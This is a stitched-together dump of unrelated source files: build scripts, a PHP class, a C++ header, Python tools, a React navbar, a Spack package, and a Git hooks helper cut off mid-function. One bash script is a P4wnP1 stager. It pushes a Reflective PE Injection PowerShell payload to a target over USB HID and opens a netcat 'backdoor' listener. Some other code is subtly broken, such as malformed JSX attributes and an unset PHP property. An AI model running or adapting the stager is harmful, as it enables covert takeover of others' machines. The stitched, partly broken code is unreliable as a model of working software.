readonly BAZEL_CMD="$BASE_PATH/tools/base/bazel/bazel"
readonly M2REPO_DIR="$PREBUILTS_DIR/tools/common/androidx-integration/m2repository"
readonly ANDROIDX_INTERNAL_DIR="$PREBUILTS_DIR/androidx/internal"
echo "Using basepath $BASE_PATH"
echo "Starting $0 at $(date)"
# Build the androidx SNAPSHOT artifacts (sibling script, same directory)
$SCRIPT_PATH/androidx_snapshot.sh
mkdir -p $M2REPO_DIR
# Copy internal and the output to prebuilts/tools/common/androidx-integration
cp -R $ANDROIDX_INTERNAL_DIR/* $M2REPO_DIR
# unzip flags: -q quiet, -u update-only, -o overwrite without prompting
unzip -quo $OUT_DIR/dist/top-of-tree-m2repository-all-*.zip -d $M2REPO_DIR/..
# Run the integration test suite against the repository assembled above
$BAZEL_CMD test //tools/adt/idea/androidx-integration-tests:intellij.android.androidx-integration-tests
echo "Completing $0 at $(date)"
|
<?php
class HttpResponse {
    /**
     * True when the stored HTTP status code is exactly 200 (strict compare).
     * NOTE(review): $this->statusCode is never declared or assigned in this
     * class — presumably set externally; confirm before relying on isOk().
     */
    public function isOk() {
        // Assuming $this->statusCode contains the HTTP status code
        return $this->statusCode === 200;
    }
    /**
     * Formats a task record as "Task: <title>, Status: <status>",
     * appending " (Active)" when status loosely equals 1 ('1' matches too).
     *
     * @param array $data expects keys 'title' and 'status'
     * @return string
     */
    public function formatTaskData($data) {
        $formattedStatus = $data['status'] == 1 ? ' (Active)' : '';
        return "Task: {$data['title']}, Status: {$data['status']}{$formattedStatus}";
    }
}
$response = new HttpResponse();
// Check if the response is okay
// NOTE(review): statusCode was never set on this instance, so isOk()
// compares an unset property against 200 (false; warns on newer PHP).
if($response->isOk()){
    // do whatever you want
}
// Sample task record matching formatTaskData's expected keys
$data = [
    'title'=>'Task No 1',
    'status'=>1
];
// Format task data
$formattedData = $response->formatTaskData($data);
echo $formattedData;
?> |
/*=========================================================================
Program: ParaView
Module: PrismScaleViewDialog.h
=========================================================================*/
#ifndef __PrismScaleViewDialog_h
#define __PrismScaleViewDialog_h
#include <QDialog>
#include <QString>
class PrismView;
class QAbstractButton;
class QCloseEvent;
/**
 * Dialog for editing the scale settings of a PrismView.
 * Saves its on-screen position when closed (see closeEvent /
 * saveWindowPosition) so it reopens where the user left it.
 */
class PrismScaleViewDialog : public QDialog
{
  Q_OBJECT
  typedef QDialog Superclass;
public:
  PrismScaleViewDialog(QWidget* parent=0, Qt::WindowFlags flags=0);
  virtual ~PrismScaleViewDialog();
  // Sets the view whose scale settings this dialog edits.
  void setView(PrismView* view);
public slots:
  // Refreshes the view info before displaying the dialog.
  void show();
protected slots:
  // Reacts to the scale-mode combo changing (e.g. custom vs. automatic).
  void onModeChanged(const QString& mode);
  void onCustomBoundsChanged();
  void onButtonClicked(QAbstractButton * button);
protected:
  bool hasCustomBounds() const;
  void modeChanged(const int& pos, const int& value);
  void setupViewInfo();
  void updateView();
  //needed to handle saving the dialog position on screen
  virtual void closeEvent( QCloseEvent* cevent);
  void saveWindowPosition();
private:
  class pqInternals;       // PIMPL; defined in the implementation file
  pqInternals *Internals;
  PrismView *View;         // view being configured — ownership not shown here
};
#endif
|
<filename>pycval/__main__.py
import hashlib
import logging
import sys
from .pycval import checksum, validate
# Module-level logger with a stream handler printing
# "<time> - <LEVEL>: <logger name> - <message>".
base_logger = logging.getLogger(__name__)
stream_handler = logging.StreamHandler()
stream_formatter = logging.Formatter(
    '%(asctime)s - %(levelname)s: %(name)s - %(message)s'
)
stream_handler.setFormatter(stream_formatter)
base_logger.addHandler(stream_handler)
# CLI entry point: two subcommands sharing an input/algorithm/debug arg set.
#   checksum  - print (or dump to disk) the hash of the input
#   validate  - compare the input's hash against a file or string
if __name__ == '__main__':
    import argparse
    import os
    base_logger = logging.getLogger(__name__)
    parser = argparse.ArgumentParser(description='Checksum validator')
    hash_algorithms = list(hashlib.algorithms_guaranteed)
    # Arguments shared by both subcommands (attached via parents=[...])
    common_args = argparse.ArgumentParser(add_help=False)
    common_args.add_argument(
        'input',
        nargs='?',
        help='Source input. This can be a file, a string or stdin',
        default=sys.stdin
    )
    common_args.add_argument(
        '-a',
        '--algorithm',
        choices=hash_algorithms,
        help='Hash algorithm. Possible values: ' + ', '.join(hash_algorithms),
        metavar='',
        required=True
    )
    common_args.add_argument(
        '--debug',
        help='Turn on debugging output',
        action='store_true',
        default=False
    )
    subparsers = parser.add_subparsers(description='Method to use', dest='cmd')
    checksum_arg = subparsers.add_parser('checksum', parents=[common_args])
    checksum_arg.set_defaults(func=checksum)
    checksum_arg.add_argument(
        '-d',
        '--dump',
        help='Dump hash to disk',
        action='store_true'
    )
    validate_arg = subparsers.add_parser('validate', parents=[common_args])
    validate_arg.set_defaults(func=validate)
    validate_arg.add_argument(
        '-f',
        '--file',
        help='Check file'
    )
    validate_arg.add_argument(
        '-s',
        '--string',
        help='Check string'
    )
    args = parser.parse_args()
    base_logger.setLevel(logging.DEBUG if args.debug else logging.WARNING)
    base_logger.debug(f'args = {args}')
    def detect_input(inp):
        """Check if inp is a file, stdin or just a string"""
        # Result dict: exactly one of the keys ends up non-None.
        _inp = {k: None for k in ['file', 'string', 'stdin']}
        try:
            # File-like objects (e.g. sys.stdin) have isatty(); plain strings
            # raise AttributeError. NOTE(review): this reads stdin eagerly,
            # so it blocks when stdin is an interactive TTY with no input.
            inp.isatty()
            _inp['stdin'] = inp.read()
            return _inp
        except AttributeError:
            try:
                if not (os.path.exists(inp) and os.path.isfile(inp)):
                    raise FileNotFoundError
                _inp['file'] = inp
                return _inp
            except FileNotFoundError:
                # Not an existing file path: treat the argument as a literal.
                _inp['string'] = inp
                return _inp
    inp = detect_input(args.input)
    base_logger.debug(f'inp = {inp}')
    # Non-file inputs (stdin content or literal string) are hashed as text.
    as_string = False
    if inp.get('stdin') or inp.get('string'):
        as_string = True
    if args.cmd == 'checksum':
        _checksum = args.func(
            *[i for i in inp.values() if i],
            args.algorithm,
            as_string
        )
        if args.dump:
            # Output file name encodes the algorithm, e.g. pycval_output.sha256
            with open('pycval_output.' + str(args.algorithm), 'w') as out:
                out.write(str(_checksum))
        else:
            print(_checksum)
    elif args.cmd == 'validate':
        _validate = args.func(
            *[i for i in inp.values() if i],
            args.algorithm,
            csum_file=args.file,
            csum_string=args.string,
            as_string=as_string
        )
        print(_validate)
|
import numpy as np
from deepthought.experiments.encoding.experiment_templates.base import NestedCVExperimentTemplate
class SVCBaseline(NestedCVExperimentTemplate):
    """Nested-CV baseline with no learned encoder: raw stored features are
    passed straight through to a linear SVC classifier."""
    def pretrain_encoder(self, *args, **kwargs):
        # Instead of training anything, return an identity "encoder" that
        # merely loads the requested feature rows from the HDF5 dataset.
        def dummy_encoder_fn(indices):
            if type(indices) == np.ndarray:
                indices = indices.tolist() # ndarray is not supported as indices
            # read the chunk of data for the given indices
            state = self.full_hdf5.open()
            data = self.full_hdf5.get_data(request=indices, state=state)
            self.full_hdf5.close(state)
            # get only the features source
            source_idx = self.full_hdf5.sources.index('features')
            data = np.ascontiguousarray(data[source_idx])
            # apply optional channel mean
            if self.hyper_params['ch_mean'] is True:
                data = data.mean(axis=1) # bc01 format -> will result in b01 format
            return data
        return dummy_encoder_fn
    def run(self, verbose=False):
        # Imported lazily here rather than at module level.
        from deepthought.experiments.encoding.classifiers.linear_svc import LinearSVCClassifierFactory
        super(SVCBaseline, self).run(classifiers=(('linear_svc', LinearSVCClassifierFactory()),), verbose=verbose)
|
<gh_stars>0
import React, {Component} from "react"
import logoFuji from '../../include/img/fujioka-logo.png';
class NavBar extends Component{
render(){
return (
<nav className="navbar navbar-expand-lg navbar-light bg-light">
<a className="navbar-brand"
href="#logo"
rel="noopener noreferrer" >
<img src={logoFuji} alt="<NAME>" width="100" height="100"/>
</a>
<button className="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
<span className="navbar-toggler-icon"></span>
</button>
<div className="collapse navbar-collapse" id="navbarSupportedContent">
<ul className="navbar-nav mr-auto">
<li className="nav-item active">
// Veja o problema que será relatado no console, para corrigir adicione na tag da sequência rel="noopener noreferrer"
<a className="nav-link"
href="https://github.com/professorfujioka/lab-react"
target="_blank"
>Instruções
<span class="sr-only">(current)
</span>
</a>
</li>
<li className="nav-item">
<a className="nav-link"
href="https://www.wscom.com.br/docente-de-ti-do-unipe-ministra-palestra-na-expotec-2017"
target="_blank" rel="noopener noreferrer" >Docker
</a>
</li>
<li className="nav-item dropdown">
<a className="nav-link dropdown-toggle"
href="#"
rel="noopener noreferrer"
id="navbarDropdown"
ole="button"
ata-toggle="dropdown"
aria-haspopup="true"
aria-expanded="false">
Produto
</a>
<div className="dropdown-menu" aria-labelledby="navbarDropdown">
<a className="dropdown-item" href="#cadastro">Cadastrar</a>
<a className="dropdown-item" href="#alteracao">Alterar</a>
<div className="dropdown-divider"></div>
<a className="dropdown-item" href="#listar">Listar</a>
</div>
</li>
</ul>
<form className="form-inline my-2 my-lg-0">
<input className="form-control mr-sm-2" type="search" placeholder="Search" aria-label="Search"></input>
<button className="btn btn-outline-success my-2 my-sm-0" type="submit">Busca</button>
</form>
</div>
</nav>
)
}
}
export default NavBar; |
#!/bin/bash
# Starts the HID covert-channel stager for the Reflective PE Injection
# payload: streams Stage2.ps1 to the target over the raw HID device,
# triggers the Stage1 HIDScript, and brings up the netcat backdoor
# listener in a screen session if it is not already running.
#
# Fix: output was redirected to "/dev.null", which created a junk file at
# the filesystem root instead of discarding output — now "/dev/null".
# $hidraw is also quoted to survive unexpected whitespace.
hidraw=$(P4wnP1_cli usb get device raw)
if [ "$hidraw" = "" ]; then
    echo "[!] No raw HID device found, aborting";
    exit
fi
if [ ! -f /usr/local/P4wnP1/legacy/Stage2.ps1 ]; then
    echo "[!] Stage2.ps1 not found, Use StageGenerator.py to generate it!"
    exit
fi
echo "[*] Kill old hidstager processes..."
ps -aux | grep hidstager.py | grep -v grep | awk {'system("kill "$2)'}
echo "[*] Starting HID stager for Reflective PE Injection covert channel payload..."
python /usr/local/P4wnP1/legacy/hidstager.py -s -i /usr/local/P4wnP1/legacy/Stage2.ps1 -o "$hidraw" &
P4wnP1_cli hid run -n Stage1.js > /dev/null
if ! ps -aux | grep netcat | grep -q -v grep; then
    echo "[*] Start backdoor covert channel server and attach to screen session..."
    screen -dmS backdoor bash -c "netcat -lvp 4444"
    echo "[+] Type \"screen -d -r backdoor\" to switch to backdoor cli"
else
    echo "[!] HID covert channel server already running"
fi
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by <NAME>, <EMAIL>, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Phasta(CMakePackage):
    """SCOREC RPI's Parallel Hierarchic Adaptive Stabilized Transient Analysis
    (PHASTA) of compressible and incompressible Navier Stokes equations."""
    homepage = "https://www.scorec.rpi.edu/software.php"
    url = "https://github.com/PHASTA/phasta.git"
    # '0.0.1' is pinned to a specific commit; 'develop' tracks upstream master.
    version('0.0.1', git='https://github.com/PHASTA/phasta.git',
            commit='11f431f2d1a53a529dab4b0f079ab8aab7ca1109')
    version('develop', git='https://github.com/PHASTA/phasta.git',
            branch='master')
    depends_on('mpi')
    def cmake_args(self):
        """CMake configuration: MPI on, auxiliary tools (ConverterIO, Acustat,
        M2N, LESLIB, PETSc) off, SVLS solver on, and both incompressible and
        compressible solvers enabled; C/C++/Fortran compilers are forced to
        the MPI wrappers from the resolved 'mpi' dependency."""
        spec = self.spec
        args = [
            '-DPHASTA_USE_MPI=ON',
            '-DPHASTA_BUILD_CONVERTERIO=OFF',
            '-DPHASTA_BUILD_ACUSTAT=OFF',
            '-DPHASTA_BUILD_M2N=OFF',
            '-DPHASTA_BUILD_M2NFixBnd=OFF',
            '-DPHASTA_USE_LESLIB=OFF',
            '-DPHASTA_USE_PETSC=OFF',
            '-DPHASTA_USE_SVLS=ON',
            '-DPHASTA_INCOMPRESSIBLE=ON',
            '-DPHASTA_COMPRESSIBLE=ON',
            '-DCMAKE_C_COMPILER=%s' % spec['mpi'].mpicc,
            '-DCMAKE_CXX_COMPILER=%s' % spec['mpi'].mpicxx,
            '-DCMAKE_Fortran_COMPILER=%s' % spec['mpi'].mpifc,
        ]
        return args
|
#!/bin/sh
#
# Command line helper for https://github.com/rycus86/githooks
#
# This tool provides a convenience utility to manage
# Githooks configuration, hook files and other
# related functionality.
# This script should be an alias for `git hooks`, done by
# git config --global alias.hooks "!${SCRIPT_DIR}/githooks"
#
# See the documentation in the project README for more information,
# or run the `git hooks help` command for available options.
#
# Legacy version number. Not used anymore, but old installs read it.
# Version: 9912.310000-000000
#####################################################
# Prints the command line help for usage and
# available commands.
#####################################################
# Prints the top-level `git hooks` usage text: the banner followed by the
# one-line summary of every available subcommand.
print_help() {
    print_help_header
    echo "
Available commands:
    disable     Disables a hook in the current repository
    enable      Enables a previously disabled hook in the current repository
    accept      Accepts the pending changes of a new or modified hook
    trust       Manages settings related to trusted repositories
    list        Lists the active hooks in the current repository
    shared      Manages the shared hook repositories
    install     Installs the latest Githooks hooks
    uninstall   Uninstalls the Githooks hooks
    update      Performs an update check
    readme      Manages the Githooks README in the current repository
    ignore      Manages Githooks ignore files in the current repository
    config      Manages various Githooks configuration
    tools       Manages script folders for tools
    version     Prints the version number of this script
    help        Prints this help message
You can also execute \`git hooks <cmd> help\` for more information on the individual commands.
"
}
#####################################################
# Prints a general header to be included
# as the first few lines of every help message.
#####################################################
# Emits the common Githooks banner (leading blank line, project URL,
# underline) that heads every help message.
print_help_header() {
    printf '\nGithooks - https://github.com/rycus86/githooks\n----------------------------------------------\n'
}
#####################################################
# Sets the ${INSTALL_DIR} variable.
#
# Returns: None
#####################################################
# Sets the ${INSTALL_DIR} variable from the global githooks.installDir
# git config, falling back to ~/.githooks when unset or when the
# configured directory is missing; also derives ${GITHOOKS_CLONE_DIR}.
#
# Returns: None
load_install_dir() {
    INSTALL_DIR=$(git config --global --get githooks.installDir)
    if [ -z "${INSTALL_DIR}" ]; then
        # install dir not defined, use default
        INSTALL_DIR=~/".githooks"
    elif [ ! -d "$INSTALL_DIR" ]; then
        # configured but missing on disk: warn and fall back to the default
        echo "! Githooks installation is corrupt! " >&2
        echo " Install directory at ${INSTALL_DIR} is missing." >&2
        INSTALL_DIR=~/".githooks"
        echo " Falling back to default directory at ${INSTALL_DIR}" >&2
        echo " Please run the Githooks install script again to fix it." >&2
    fi
    # The Githooks release clone lives inside the install dir
    GITHOOKS_CLONE_DIR="$INSTALL_DIR/release"
}
#####################################################
# Set up the main variables that
# we will throughout the hook.
#
# Sets the ${CURRENT_GIT_DIR} variable
#
# Returns: None
#####################################################
# Sets the ${CURRENT_GIT_DIR} variable (the repo's common .git directory),
# loads the install dir, and defines the newline-only IFS used by loops.
#
# Returns: None
set_main_variables() {
    CURRENT_GIT_DIR=$(git rev-parse --git-common-dir 2>/dev/null)
    # Guard: some git versions echo the flag itself back instead of a
    # path when --git-common-dir is unsupported — fall back to ".git".
    if [ "${CURRENT_GIT_DIR}" = "--git-common-dir" ]; then
        CURRENT_GIT_DIR=".git"
    fi
    load_install_dir
    # Global IFS for loops
    IFS_NEWLINE="
"
}
#####################################################
# Checks if the current directory is
# a Git repository or not.
# Returns:
# 0 if it is likely a Git repository,
# 1 otherwise
#####################################################
# Succeeds (0) when the working directory looks like the root of a Git
# repository: `git rev-parse` works and ${CURRENT_GIT_DIR} exists.
is_running_in_git_repo_root() {
    if ! git rev-parse >/dev/null 2>&1; then
        return 1
    fi
    if [ ! -d "${CURRENT_GIT_DIR}" ]; then
        return 1
    fi
    return 0
}
#####################################################
# Echo if the current repository is non-bare.
#
# Returns: 0
#####################################################
# Echoes its arguments only when the current repository is non-bare
# (i.e. `git rev-parse --is-bare-repository` prints "false").
#
# Returns: 0
echo_if_non_bare_repo() {
    if [ "$(git rev-parse --is-bare-repository 2>/dev/null)" != "false" ]; then
        return 0
    fi
    echo "$@"
}
#####################################################
# Finds a hook file path based on trigger name,
# file name, relative or absolute path, or
# some combination of these.
#
# Sets the ${HOOK_PATH} environment variable.
#
# Returns:
# 0 on success, 1 when no hooks found
#####################################################
# Finds a hook file path based on trigger name, file name, relative or
# absolute path, or some combination of these; with --shared, searches the
# checked-out shared hook repositories instead of the local one.
#
# Sets the ${HOOK_PATH} environment variable.
#
# Returns:
#   0 on success, 1 when no hooks found
find_hook_path_to_enable_or_disable() {
    # --- shared-repository lookup -------------------------------------
    if [ "$1" = "--shared" ]; then
        shift
        if [ -z "$1" ]; then
            echo "! For shared repositories, either the trigger type" >&2
            echo " the hook name or both needs to be given" >&2
            return 1
        fi
        if [ ! -d "$INSTALL_DIR/shared" ]; then
            echo "! No shared repositories found" >&2
            return 1
        fi
        IFS="$IFS_NEWLINE"
        for SHARED_ROOT in "$INSTALL_DIR/shared/"*; do
            unset IFS
            if [ ! -d "$SHARED_ROOT" ]; then
                continue
            fi
            # Only consider clones whose remote URL is referenced either by
            # the repo-local .githooks/.shared file or the global config.
            REMOTE_URL=$(git -C "$SHARED_ROOT" config --get remote.origin.url)
            SHARED_LOCAL_REPOS_LIST=$(grep -E "^[^#\n\r ].*$" <"$(pwd)/.githooks/.shared")
            ACTIVE_LOCAL_REPO=$(echo "$SHARED_LOCAL_REPOS_LIST" | grep -F -o "$REMOTE_URL")
            ACTIVE_GLOBAL_REPO=$(git config --global --get-all githooks.shared | grep -o "$REMOTE_URL")
            if [ "$ACTIVE_LOCAL_REPO" != "$REMOTE_URL" ] && [ "$ACTIVE_GLOBAL_REPO" != "$REMOTE_URL" ]; then
                continue
            fi
            # trigger + hook name: try <root>/.githooks/<trigger>/<name>,
            # then <root>/<trigger>/<name>
            if [ -n "$1" ] && [ -n "$2" ]; then
                if [ -f "$SHARED_ROOT/.githooks/$1/$2" ]; then
                    HOOK_PATH="$SHARED_ROOT/.githooks/$1/$2"
                    return
                elif [ -f "$SHARED_ROOT/$1/$2" ]; then
                    HOOK_PATH="$SHARED_ROOT/$1/$2"
                    return
                fi
            elif [ -d "$SHARED_ROOT/.githooks" ]; then
                HOOK_PATH=$(find "$SHARED_ROOT/.githooks" -name "$1" | head -1)
                [ -n "$HOOK_PATH" ] && return 0 || return 1
            else
                HOOK_PATH=$(find "$SHARED_ROOT" -name "$1" | head -1)
                [ -n "$HOOK_PATH" ] && return 0 || return 1
            fi
            IFS="$IFS_NEWLINE"
        done
        echo "! Sorry, cannot find any shared hooks that would match that" >&2
        return 1
    fi
    # --- local-repository lookup --------------------------------------
    if [ -z "$1" ]; then
        # no arguments: use the whole .githooks directory
        HOOK_PATH=$(cd .githooks && pwd)
    elif [ -n "$1" ] && [ -n "$2" ]; then
        # trigger + hook name
        HOOK_TARGET="$(pwd)/.githooks/$1/$2"
        if [ -e "$HOOK_TARGET" ]; then
            HOOK_PATH="$HOOK_TARGET"
        fi
    elif [ -n "$1" ]; then
        # single argument: a path, a file under .githooks, a trigger
        # directory name, or a hook file name anywhere under .githooks
        if [ -e "$1" ]; then
            HOOK_DIR=$(dirname "$1")
            HOOK_NAME=$(basename "$1")
            if [ "$HOOK_NAME" = "." ]; then
                HOOK_PATH=$(cd "$HOOK_DIR" && pwd)
            else
                HOOK_PATH=$(cd "$HOOK_DIR" && pwd)/"$HOOK_NAME"
            fi
        elif [ -f ".githooks/$1" ]; then
            HOOK_PATH=$(cd .githooks && pwd)/"$1"
        else
            for HOOK_DIR in .githooks/*; do
                HOOK_ITEM=$(basename "$HOOK_DIR")
                if [ "$HOOK_ITEM" = "$1" ]; then
                    HOOK_PATH=$(cd "$HOOK_DIR" && pwd)
                fi
                if [ ! -d "$HOOK_DIR" ]; then
                    continue
                fi
                HOOK_DIR=$(cd "$HOOK_DIR" && pwd)
                IFS="$IFS_NEWLINE"
                for HOOK_FILE in "$HOOK_DIR"/*; do
                    unset IFS
                    HOOK_ITEM=$(basename "$HOOK_FILE")
                    if [ "$HOOK_ITEM" = "$1" ]; then
                        HOOK_PATH="$HOOK_FILE"
                    fi
                    IFS="$IFS_NEWLINE"
                done
            done
        fi
    fi
    if [ -z "$HOOK_PATH" ]; then
        echo "! Sorry, cannot find any hooks that would match that" >&2
        return 1
    elif echo "$HOOK_PATH" | grep -F -qv "/.githooks"; then
        # resolved path is outside .githooks: accept only if it contains one
        if [ -d "$HOOK_PATH/.githooks" ]; then
            HOOK_PATH="$HOOK_PATH/.githooks"
        else
            echo "! Sorry, cannot find any hooks that would match that" >&2
            return 1
        fi
    fi
}
#####################################################
# Creates the Githooks checksum file
# for the repository if it does not exist yet.
#####################################################
# Creates the per-repository Githooks checksum file if it does not
# exist yet (touch also refreshes its mtime when it already does).
ensure_checksum_file_exists() {
    touch "${CURRENT_GIT_DIR}/.githooks.checksum"
}
#####################################################
# Disables one or more hook files
# in the current repository.
#
# Returns:
# 1 if the current directory is not a Git repo,
# 0 otherwise
#####################################################
# Disables one or more hook files in the current repository by writing
# "disabled> <path>" markers into the checksum file; -a/--all and
# -r/--reset toggle the repo-wide githooks.disable config instead.
#
# Returns:
#   1 if the current directory is not a Git repo,
#   0 otherwise
disable_hook() {
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks disable [--shared] [trigger] [hook-script]
git hooks disable [--shared] [hook-script]
git hooks disable [--shared] [trigger]
git hooks disable [-a|--all]
git hooks disable [-r|--reset]
Disables a hook in the current repository.
The \`trigger\` parameter should be the name of the Git event if given.
The \`hook-script\` can be the name of the file to disable, or its
relative path, or an absolute path, we will try to find it.
If the \`--shared\` parameter is given as the first argument,
hooks in the shared repositories will be disabled,
otherwise they are looked up in the current local repository.
The \`--all\` parameter on its own will disable running any Githooks
in the current repository, both existing ones and any future hooks.
The \`--reset\` parameter is used to undo this, and let hooks run again.
"
        return
    fi
    if ! is_running_in_git_repo_root; then
        echo "! The current directory \`$(pwd)\` does not seem" >&2
        echo " to be the root of a Git repository!" >&2
        exit 1
    fi
    # --all: block every current and future hook via local git config
    if [ "$1" = "-a" ] || [ "$1" = "--all" ]; then
        git config githooks.disable true &&
        echo "All existing and future hooks are disabled in the current repository" &&
        return
        echo "! Failed to disable hooks in the current repository" >&2
        exit 1
    # --reset: undo a previous --all
    elif [ "$1" = "-r" ] || [ "$1" = "--reset" ]; then
        git config --unset githooks.disable
        if ! git config --get githooks.disable; then
            echo "Githooks hook files are not disabled anymore by default" && return
        else
            echo "! Failed to re-enable Githooks hook files" >&2
            exit 1
        fi
    fi
    if ! find_hook_path_to_enable_or_disable "$@"; then
        if [ "$1" = "update" ]; then
            echo " Did you mean \`git hooks update disable\` ?"
        fi
        exit 1
    fi
    ensure_checksum_file_exists
    # Append a "disabled>" marker for each matched hook file (idempotent)
    find "$HOOK_PATH" -type f -path "*/.githooks/*" | while IFS= read -r HOOK_FILE; do
        if grep -q "disabled> $HOOK_FILE" "${CURRENT_GIT_DIR}/.githooks.checksum" 2>/dev/null; then
            echo "Hook file is already disabled at $HOOK_FILE"
            continue
        fi
        echo "disabled> $HOOK_FILE" >>"${CURRENT_GIT_DIR}/.githooks.checksum"
        echo "Hook file disabled at $HOOK_FILE"
    done
}
#####################################################
# Enables one or more hook files
# in the current repository.
#
# Returns:
# 1 if the current directory is not a Git repo,
# 0 otherwise
#####################################################
# Enables one or more previously disabled hook files in the current
# repository by deleting their "disabled>" markers from the checksum file.
#
# Returns:
#   1 if the current directory is not a Git repo,
#   0 otherwise
enable_hook() {
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks enable [--shared] [trigger] [hook-script]
git hooks enable [--shared] [hook-script]
git hooks enable [--shared] [trigger]
Enables a hook or hooks in the current repository.
The \`trigger\` parameter should be the name of the Git event if given.
The \`hook-script\` can be the name of the file to enable, or its
relative path, or an absolute path, we will try to find it.
If the \`--shared\` parameter is given as the first argument,
hooks in the shared repositories will be enabled,
otherwise they are looked up in the current local repository.
"
        return
    fi
    if ! is_running_in_git_repo_root; then
        echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
        exit 1
    fi
    if ! find_hook_path_to_enable_or_disable "$@"; then
        if [ "$1" = "update" ]; then
            echo " Did you mean \`git hooks update enable\` ?"
        fi
        exit 1
    fi
    ensure_checksum_file_exists
    # Drop every "disabled> <HOOK_PATH>" line, rewriting via a temp file
    sed "\\|disabled> $HOOK_PATH|d" "${CURRENT_GIT_DIR}/.githooks.checksum" >"${CURRENT_GIT_DIR}/.githooks.checksum.tmp" &&
        mv "${CURRENT_GIT_DIR}/.githooks.checksum.tmp" "${CURRENT_GIT_DIR}/.githooks.checksum" &&
        echo "Hook file(s) enabled at $HOOK_PATH"
}
#####################################################
# Accept changes to a new or existing but changed
# hook file by recording its checksum as accepted.
#
# Returns:
# 1 if the current directory is not a Git repo,
# 0 otherwise
#####################################################
# Accepts changes to a new or modified hook file by recording its current
# Git blob checksum in the per-repository checksum file.
#
# Returns:
#   1 if the current directory is not a Git repo,
#   0 otherwise
accept_changes() {
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks accept [--shared] [trigger] [hook-script]
git hooks accept [--shared] [hook-script]
git hooks accept [--shared] [trigger]
Accepts a new hook or changes to an existing hook.
The \`trigger\` parameter should be the name of the Git event if given.
The \`hook-script\` can be the name of the file to enable, or its
relative path, or an absolute path, we will try to find it.
If the \`--shared\` parameter is given as the first argument,
hooks in the shared repositories will be accepted,
otherwise they are looked up in the current local repository.
"
        return
    fi
    if ! is_running_in_git_repo_root; then
        echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
        exit 1
    fi
    find_hook_path_to_enable_or_disable "$@" || exit 1
    ensure_checksum_file_exists
    # Record "<sha1> <path>" for every matched hook file; disabled
    # hooks are skipped and reported instead.
    find "$HOOK_PATH" -type f -path "*/.githooks/*" | while IFS= read -r HOOK_FILE; do
        if grep -q "disabled> $HOOK_FILE" "${CURRENT_GIT_DIR}/.githooks.checksum"; then
            echo "Hook file is currently disabled at $HOOK_FILE"
            continue
        fi
        CHECKSUM=$(get_hook_checksum "$HOOK_FILE")
        echo "$CHECKSUM $HOOK_FILE" >>"${CURRENT_GIT_DIR}/.githooks.checksum" &&
            echo "Changes accepted for $HOOK_FILE"
    done
}
#####################################################
# Returns the SHA1 hash of the hook file
# passed in as the first argument.
#####################################################
# Prints the Git blob SHA-1 of the hook file passed as the first
# argument (empty output if the file cannot be hashed).
get_hook_checksum() {
    git hash-object "$1" 2>/dev/null
}
#####################################################
# Manage settings related to trusted repositories.
# It allows setting up and clearing marker
# files and Git configuration.
#
# Returns:
# 1 on failure, 0 otherwise
#####################################################
# Manages the trusted-repository setting: creates/removes the
# .githooks/trust-all marker file and the githooks.trust.all git config.
#
# Returns:
#   1 on failure, 0 otherwise
manage_trusted_repo() {
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks trust
git hooks trust [revoke]
git hooks trust [delete]
git hooks trust [forget]
Sets up, or reverts the trusted setting for the local repository.
When called without arguments, it marks the local repository as trusted.
The \`revoke\` argument resets the already accepted trust setting,
and the \`delete\` argument also deletes the trusted marker.
The \`forget\` option unsets the trust setting, asking for accepting
it again next time, if the repository is marked as trusted.
"
        return
    fi
    if ! is_running_in_git_repo_root; then
        echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
        exit 1
    fi
    # no argument: create the marker file and accept it via config
    if [ -z "$1" ]; then
        mkdir -p .githooks &&
        touch .githooks/trust-all &&
        git config githooks.trust.all Y &&
        echo "The current repository is now trusted." &&
        echo_if_non_bare_repo " Do not forget to commit and push the trust marker!" &&
        return
        echo "! Failed to mark the current repository as trusted" >&2
        exit 1
    fi
    # forget: clear the local answer so it is asked again next time
    if [ "$1" = "forget" ]; then
        if [ -z "$(git config --local --get githooks.trust.all)" ]; then
            echo "The current repository does not have trust settings."
            return
        elif git config --unset githooks.trust.all; then
            echo "The current repository is no longer trusted."
            return
        else
            echo "! Failed to revoke the trusted setting" >&2
            exit 1
        fi
    # revoke/delete: record an explicit "N" answer first
    elif [ "$1" = "revoke" ] || [ "$1" = "delete" ]; then
        if git config githooks.trust.all N; then
            echo "The current repository is no longer trusted."
        else
            echo "! Failed to revoke the trusted setting" >&2
            exit 1
        fi
        if [ "$1" = "revoke" ]; then
            return
        fi
    fi
    # delete (or leftover marker): remove the trust-all marker file too
    if [ "$1" = "delete" ] || [ -f .githooks/trust-all ]; then
        rm -rf .githooks/trust-all &&
        echo "The trust marker is removed from the repository." &&
        echo_if_non_bare_repo " Do not forget to commit and push the change!" &&
        return
        echo "! Failed to delete the trust marker" >&2
        exit 1
    fi
    echo "! Unknown subcommand: $1" >&2
    echo " Run \`git hooks trust help\` to see the available options." >&2
    exit 1
}
#####################################################
# Checks if Githhoks is set up correctly,
# and that other git settings do not prevent it
# from executing scripts.
#####################################################
# Warns (on stderr) when `core.hooksPath` and the githooks.useCoreHooksPath
# setting disagree in either direction, since in that case the hooks in
# this repository may not actually be run by Githooks.
check_git_hooks_setup_is_correct() {
